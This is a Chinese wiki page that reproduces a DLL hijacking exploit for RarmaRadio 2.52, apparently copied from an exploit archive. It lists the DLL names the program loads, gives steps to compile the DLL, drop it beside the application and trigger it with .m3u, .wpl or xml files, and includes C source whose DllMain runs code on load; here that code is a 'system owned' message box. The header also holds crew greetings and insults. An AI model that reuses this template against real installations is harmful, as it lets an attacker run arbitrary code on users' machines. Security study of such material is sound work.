用户工具

站点工具


dll_劫持代码:rarmaradio

RarmaRadio DLL Hijacking Exploit

所属类别 msjet

msjet.c
/*
#RarmaRadio  DLL Hijacking Exploit
#Author    :   anT!-Tr0J4n
#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com 
#special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com
#Software :  http://www.raimersoft.com/rarmaradio.aspx
#Version   :  2.52 Bass 2.4
#Tested on:   Windows XP sp3
-------------------------------
Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck you kids
-------------------------------
[+] msjet49.dll
[+] msjet48.dll
[+] msjet47.dll
[+] msjet46.dll
[+] msjet45.dll
[+] msjet44.dll
[+] msjet43.dll
[+] msjet42.dll
[+] msjet41.dll
[+] msjter49.dll
[+] msjter48.dll
[+] msjter47.dll
[+] msjter46.dll
[+] msjter45.dll
[+] msjter44.dll
[+] msjter42.dll
[+] msjter41.dll
=-=-=-=-=-=-=-=-=-=-=-=-=-=
[>>] Compile code
[>>] Move DLL file to the directory where Dexosoft Virtual syv  is installed
[>>] check the result --> 0wn33d
[+] .m3u
[+] .wpl
[+] xml
*/
#include "stdafx.h"
 
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003);
}
 
 
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}
你需要登录发表评论。
dll_劫持代码/rarmaradio.txt · 最后更改: 2020/05/16 19:19 (外部编辑)

页面工具